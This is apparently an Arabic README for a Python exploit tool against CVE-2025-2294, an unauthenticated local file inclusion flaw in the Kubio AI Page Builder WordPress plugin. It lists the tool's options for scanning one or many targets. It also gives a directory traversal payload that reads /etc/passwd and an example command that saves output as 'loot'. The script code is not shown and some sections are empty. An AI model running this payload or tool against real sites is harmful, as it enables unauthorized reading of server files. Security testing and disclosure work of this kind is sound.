
# سكربت استغلال بلغة Python لثغرة CVE-2025-2294، وهي ثغرة تضمين ملفات محلي غير مصادق عليه في إضافة Kubio AI Page Builder لووردبريس حتى الإصدار 2.5.1. يدعم فحص هدف واحد أو أهداف متعددة، وحمولات مخصصة، ووكيل، ومعاينة الاستجابة.
تؤثر CVE-2025-2294 على إضافة Kubio AI Page Builder لـ WordPress (الإصدارات حتى 2.5.1 ضمنًا). تعاني من ثغرة تضمين الملفات المحلي (LFI) بدون مصادقة عبر دالة thekubio_hybrid_theme_load_template.
تسمح هذه الثغرة للمهاجم بتضمين وتنفيذ ملفات عشوائية على خادم WordPress المستهدف، مما قد يؤدي إلى:
يرسل سكربت Python هذا طلبات HTTP GET مصممة خصيصًا إلى موقع WordPress المستهدف للتحقق من تعرّضه لثغرة LFI.
/etc/passwd).usage: cve_2025_2294.py [-h] [--url URL] [--payload PAYLOAD] [--save SAVE]
[--lines LINES] [--timeout TIMEOUT] [--proxy PROXY]
[--check] [--list LIST]
CVE-2025-2294 LFI Exploit
optional arguments:
-h, --help show this help message and exit
--url URL Target URL (e.g., http://127.0.0.1:8080)
--payload PAYLOAD
LFI payload path (default: ../../../../../../../../etc/passwd)
--save SAVE Save full response to file (optional)
--lines LINES Number of preview lines (default: 10)
--timeout TIMEOUT
Request timeout in seconds (default: 10)
--proxy PROXY Proxy URL (e.g., http://127.0.0.1:8080)
--check Check vulnerability status only, no saving or preview
--list LIST Path to file with list of URLs to check one by one
python3 cve_2025_2294.py --url "http://192.168.1.10" --save loot.txt --lines 20 --payload /etc/passwd --timeout 10 --proxy "http://127.0.0.1:8080"

الطلب/الاستجابة:

هذه الأداة مخصصة لاختبارات الأمان المصرح بها وأغراض البحث فقط. الاستخدام غير المصرح به ضد الأنظمة دون إذن يعد غير قانوني وغير أخلاقي.